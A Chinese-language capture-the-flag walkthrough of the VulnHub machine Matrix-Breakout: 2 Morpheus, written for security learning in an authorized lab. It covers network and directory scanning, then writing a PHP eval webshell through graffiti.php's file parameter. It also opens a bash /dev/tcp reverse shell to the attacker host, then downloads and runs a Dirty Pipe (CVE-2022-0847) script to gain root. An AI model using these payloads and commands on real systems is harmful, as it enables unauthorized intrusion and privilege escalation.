免责声明:本文记录的是 Matrix-Breakout: 2 Morpheus 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全。
环境:
https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova一、信息收集
1、探测目标IP地址
arp-scan -l #探测当前网段的所有ip地址┌──(root?kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.10
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered)
192.168.5.2 08:00:27:48:b9:50 PCS Systemtechnik GmbH
192.168.5.13 08:00:27:c2:8f:37 PCS Systemtechnik GmbH
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.953 seconds (131.08 hosts/sec). 3 responded
nmap -sP 192.168.5.0/24┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-09 04:12 -0400
Nmap scan report for 192.168.5.1
Host is up (0.00013s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00014s latency).
MAC Address: 08:00:27:48:B9:50 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.13
Host is up (0.00013s latency).
MAC Address: 08:00:27:C2:8F:37 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.10
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.92 seconds
目标IP:192.168.5.132、探测目标IP开放端口
nmap -sV -p- 192.168.5.13┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.13
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-09 04:12 -0400
Nmap scan report for 192.168.5.13
Host is up (0.000090s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.51 ((Debian))
81/tcp open http nginx 1.18.0
MAC Address: 08:00:27:C2:8F:37 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds
端口:22、80、813、目录探测
dirsearch -u http://192.168.5.13┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.13
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.5.13/_26-03-09_04-13-44.txt
Target: http://192.168.5.13/
[04:13:44] Starting:
[04:13:45] 403 - 277B - /.ht_wsr.txt
[04:13:45] 403 - 277B - /.htaccess.bak1
[04:13:45] 403 - 277B - /.htaccess.sample
[04:13:45] 403 - 277B - /.htaccess.orig
[04:13:45] 403 - 277B - /.htaccess.save
[04:13:45] 403 - 277B - /.htaccess_extra
[04:13:45] 403 - 277B - /.htaccess_orig
[04:13:45] 403 - 277B - /.htaccess_sc
[04:13:45] 403 - 277B - /.htaccessOLD2
[04:13:45] 403 - 277B - /.htaccessBAK
[04:13:45] 403 - 277B - /.htaccessOLD
[04:13:45] 403 - 277B - /.htm
[04:13:45] 403 - 277B - /.html
[04:13:45] 403 - 277B - /.htpasswd_test
[04:13:45] 403 - 277B - /.httr-oauth
[04:13:45] 403 - 277B - /.htpasswds
[04:13:46] 403 - 277B - /.php
[04:14:05] 301 - 317B - /javascript -> http://192.168.5.13/javascript/
[04:14:13] 200 - 47B - /robots.txt
[04:14:14] 403 - 277B - /server-status
[04:14:14] 403 - 277B - /server-status/
Task Completeddirb http://192.168.5.13┌──(root㉿kali)-[~]
└─# dirb http://192.168.5.13
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Mar 9 04:13:50 2026
URL_BASE: http://192.168.5.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.5.13/ ----
+ http://192.168.5.13/index.html (CODE:200|SIZE:348)
==> DIRECTORY: http://192.168.5.13/javascript/
+ http://192.168.5.13/robots.txt (CODE:200|SIZE:47)
+ http://192.168.5.13/server-status (CODE:403|SIZE:277)
---- Entering directory: http://192.168.5.13/javascript/ ----
==> DIRECTORY: http://192.168.5.13/javascript/jquery/
---- Entering directory: http://192.168.5.13/javascript/jquery/ ----
+ http://192.168.5.13/javascript/jquery/jquery (CODE:200|SIZE:287600)
-----------------
END_TIME: Mon Mar 9 04:13:56 2026
DOWNLOADED: 13836 - FOUND: 4gobuster dir -u http://192.168.5.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.5.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.13
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 317] [--> http://192.168.5.13/javascript/]
/graffiti.php (Status: 200) [Size: 451]
/server-status (Status: 403) [Size: 277]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
二、漏洞利用
1、信息搜集
http://192.168.5.13/index.html
http://192.168.5.13/robots.txt
http://192.168.5.13/javascript/
访问81端口,发现需要账号密码,尝试了一下弱口令,未能成功登录。
http://192.168.5.13/graffiti.php
输入框输入123,yakit抓包
发现网站会将提交的内容追加到graffiti.txt文件中。
此时猜想该POST数据中的filename参数是否可控,因为内容是可控的,只要文件名可控,那么我们就可以轻易的进行文件上传了。尝试保存为1.php,点击send。
message=123&file=1.php
发现可以成功访问,接下来直接上传一句话木马。
message=<?= eval($_POST[1])?>&file=2.php
上传成功:
连接蚁剑成功:
2、反弹shell
蚁剑:
bash -c 'bash -i >& /dev/tcp/192.168.5.10/1234 0>&1'
kali:
nc -lvnp 1234反弹成功:
┌──(root?kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.5.10] from (UNKNOWN) [192.168.5.13] 41092
bash: cannot set terminal process group (464): Inappropriate ioctl for device
bash: no job control in this shell
www-data@morpheus:/var/www/html$ 三、权限提升
1、查看一下当前linux的内核版本
www-data@morpheus:/var/www/html$ uname -a
uname -a
Linux morpheus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64 GNU/Linux
www-data@morpheus:/var/www/html$ 目标机器 morpheus 的内核版本 5.10.0-9-amd64 在 Dirty Pipe (CVE-2022-0847) 漏洞的影响范围内。
2、提权
kali:
git clone https://github.com/imfiver/CVE-2022-0847.git
ls
cd CVE-2022-0847
ls
mv Dirty-Pipe.sh dp.sh
ls
python -m http.server 80┌──(root㉿kali)-[~]
└─# git clone https://github.com/imfiver/CVE-2022-0847.git
正克隆到 'CVE-2022-0847'...
remote: Enumerating objects: 40, done.
remote: Counting objects: 100% (40/40), done.
remote: Compressing objects: 100% (36/36), done.
remote: Total 40 (delta 9), reused 0 (delta 0), pack-reused 0 (from 0)
接收对象中: 100% (40/40), 11.38 KiB | 11.38 MiB/s, 完成.
处理 delta 中: 100% (9/9), 完成.
┌──(root㉿kali)-[~]
└─# ls
1.txt 2.txt 45010.c CVE-2022-0847 exp1 reports
┌──(root㉿kali)-[~]
└─# cd CVE-2022-0847
┌──(root㉿kali)-[~/CVE-2022-0847]
└─# ls
Dirty-Pipe.sh README.md
┌──(root㉿kali)-[~/CVE-2022-0847]
└─# mv Dirty-Pipe.sh dp.sh
┌──(root㉿kali)-[~/CVE-2022-0847]
└─# ls
dp.sh README.md
┌──(root㉿kali)-[~/CVE-2022-0847]
└─#
┌──(root㉿kali)-[~/CVE-2022-0847]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.5.13 - - [09/Mar/2026 04:45:30] "GET /dp.sh HTTP/1.1" 200 -靶机:
cd /tmp
ls
wget http://192.168.5.10/dp.sh
ls
chmod +x dp.sh
./dp.sh
id
whoami
cd /root
ls
cat FLAG.txtwww-data@morpheus:/var/www/html$ cd /tmp
cd /tmp
www-data@morpheus:/tmp$ ls
ls
www-data@morpheus:/tmp$
www-data@morpheus:/tmp$
www-data@morpheus:/tmp$ wget http://192.168.5.10/dp.sh
wget http://192.168.5.10/dp.sh
--2026-03-09 16:45:36-- http://192.168.5.10/dp.sh
Connecting to 192.168.5.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4855 (4.7K) [application/x-sh]
Saving to: 'dp.sh'
0K .... 100% 85.6M=0s
2026-03-09 16:45:36 (85.6 MB/s) - 'dp.sh' saved [4855/4855]
www-data@morpheus:/tmp$ ls
ls
dp.sh
www-data@morpheus:/tmp$
www-data@morpheus:/tmp$ chmod +x dp.sh
chmod +x dp.sh
www-data@morpheus:/tmp$
www-data@morpheus:/tmp$ ./dp.sh
./dp.sh
/etc/passwd已备份到/tmp/passwd
It worked!
# 恢复原来的密码
rm -rf /etc/passwd
mv /tmp/passwd /etc/passwd
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cd /root
ls
FLAG.txt
cat FLAG.txt
You've won!
Let's hope Matrix: Resurrections rocks!
本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路,始于合规,终于责任。